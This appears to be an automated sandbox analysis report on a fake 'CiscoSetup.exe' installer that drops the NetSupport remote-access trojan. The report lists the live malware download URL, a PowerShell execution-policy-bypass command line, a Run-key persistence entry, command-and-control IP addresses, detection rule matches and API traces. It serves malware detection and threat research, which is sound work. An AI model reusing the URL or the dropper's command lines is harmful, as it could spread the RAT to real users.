Windows Analysis Report
https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe

Overview

General Information

Sample URL:https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe
Analysis ID:1546280

Detection

NetSupport RAT, NetSupport Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected NetSupport Downloader
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Contains functionality to register a low level keyboard hook
Contains functionality to change the wallpaper
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64native
  • cmd.exe (PID: 5808 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • wget.exe (PID: 4116 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • CiscoSetup.exe (PID: 3556 cmdline: "C:\Users\user\Desktop\download\CiscoSetup.exe" MD5: 91F7229586DF2C577A54AD0D1A5BDCB1)
    • CiscoSetup.tmp (PID: 5648 cmdline: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" MD5: BFD84005E52425F9B8FE658B9663E1C4)
      • powershell.exe (PID: 3588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • client32.exe (PID: 4288 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 4252 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Cisco\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
0000000D.00000000.69327908302.0000000000404000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000C.00000000.69246854158.0000000000404000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000B.00000002.70082150611.00000000027FC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
13.2.client32.exe.68cb0000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
12.2.client32.exe.68cb0000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
11.0.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
11.2.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
11.2.client32.exe.68cb0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
amsi32_3588.amsi.csv | JoeSecurity_NetSupportDownloader | Yara detected NetSupport Downloader | Joe Security |
amsi32_3588.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
                                  • 0x2e4f74:$b1: ::WriteAllBytes(
                                  • 0x2e4f3e:$b2: ::FromBase64String(
                                  • 0x2f16a0:$s1: -join
                                  • 0x2eae4c:$s4: +=
                                  • 0x2eaf0e:$s4: +=
                                  • 0x2ef135:$s4: +=
                                  • 0x2f1252:$s4: +=
                                  • 0x2f153c:$s4: +=
                                  • 0x2f1682:$s4: +=
                                  • 0x2f4e98:$s4: +=
                                  • 0x2f4f9c:$s4: +=
                                  • 0x2f83f8:$s4: +=
                                  • 0x2f8ad8:$s4: +=
                                  • 0x2f8f8e:$s4: +=
                                  • 0x2f8fe3:$s4: +=
                                  • 0x2f9257:$s4: +=
                                  • 0x2f9286:$s4: +=
                                  • 0x2f97ce:$s4: +=
                                  • 0x2f97fd:$s4: +=
                                  • 0x2f98dc:$s4: +=
                                  • 0x2fbb73:$s4: +=

                                  System Summary

                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp, ParentProcessId: 5648, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", ProcessId: 3588, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp, ParentProcessId: 5648, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", ProcessId: 3588, ProcessName: powershell.exe
                                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp, ParentProcessId: 5648, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", ProcessId: 3588, ProcessName: powershell.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Cisco\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3588, TargetFilename: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll
                                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6464, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1, ProcessId: 5808, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp, ParentProcessId: 5648, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", ProcessId: 3588, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3588, TargetFilename: C:\Users\user\AppData\Roaming\Cisco\NSM.LIC
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T18:05:21.486338+0100 | 2021697 | 1 | A Network Trojan was detected | 192.168.11.20 | 49755 | 54.37.62.77 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T18:05:13.649480+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49756 | 151.236.16.15 | 443 | TCP
2024-10-31T18:05:13.649480+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49758 | 199.188.200.195 | 443 | TCP

                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,CryptGetProvParam,CryptGetProvParam,GetLastError,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,11_2_110AC820
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,CryptGetProvParam,CryptGetProvParam,GetLastError,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,12_2_110AC820
                                  Source: is-4ES8I.tmp.6.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_467a8e15-5
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to behavior
                                  Source: unknownHTTPS traffic detected: 54.37.62.77:443 -> 192.168.11.20:49755 version: TLS 1.2
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 0000000B.00000002.70085959450.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000C.00000002.69251363793.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000D.00000002.69332147319.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69181004956.000000000A0AB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\kdf\api\layer4\winxp\Win32\Release\ac_sock_fltr_api.pdb% source: is-8FFCG.tmp.6.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69174549429.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Agent\Win32\Release\vpnagent.pdb source: is-J44M9.tmp.6.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Agent\Win32\Release\vpnagent.pdbaa\GCTL source: is-J44M9.tmp.6.dr
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdb source: is-C05BP.tmp.6.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Downloader\Win32\Release\vpndownloader.pdb source: is-4ES8I.tmp.6.dr
                                  Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000C.00000002.69251018247.0000000068BF1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000D.00000002.69331721534.0000000068BF1000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69180702830.0000000009FC0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdcrypto\buildinf.pdb /MT /Zl /Gs0 /GF /Gy /W3 /Zf /wd4090 /nologo /O2 /guard:cf -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DOPENSSL_USE_BUILD_DATE -DOPENSSL_NO_HEARTBEATS -D_CRT_SECURE_NO_WARNINGS -DNDEBUG /I C:/Users/build/p4files/ngc/Quicksilver/published/openssl/include source: is-4ES8I.tmp.6.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\kdf\api\layer4\winxp\Win32\Release\ac_sock_fltr_api.pdb source: is-8FFCG.tmp.6.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdbAAA source: is-C05BP.tmp.6.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 0000000B.00000002.70086113734.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000C.00000002.69251545748.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000D.00000002.69332386538.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp
                                  Source: Binary string: crypto\pem\pem_pkey.cRSA PRIVATE KEYDSA PRIVATE KEYEC PRIVATE KEYcompiler: cl /Zi /Fdcrypto\buildinf.pdb /MT /Zl /Gs0 /GF /Gy /W3 /Zf /wd4090 /nologo /O2 /guard:cf -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DOPENSSL_USE_BUILD_DATE -DOPENSSL_NO_HEARTBEATS -D_CRT_SECURE_NO_WARNINGS -DNDEBUG /I C:/Users/build/p4files/ngc/Quicksilver/published/openssl/includecrypto\asn1\x_info.ccrypto\pem\pem_info.ccrypto\ocsp\ocsp_lib.c source: is-4ES8I.tmp.6.dr
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11123570 GetVersionExA,GetTempPathA,GetModuleFileNameA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,11_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11107FE0 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,11_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11064E30 CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,12_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11123570 GetVersionExA,GetTempPathA,GetModuleFileNameA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,12_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,12_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11107FE0 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,12_2_11107FE0
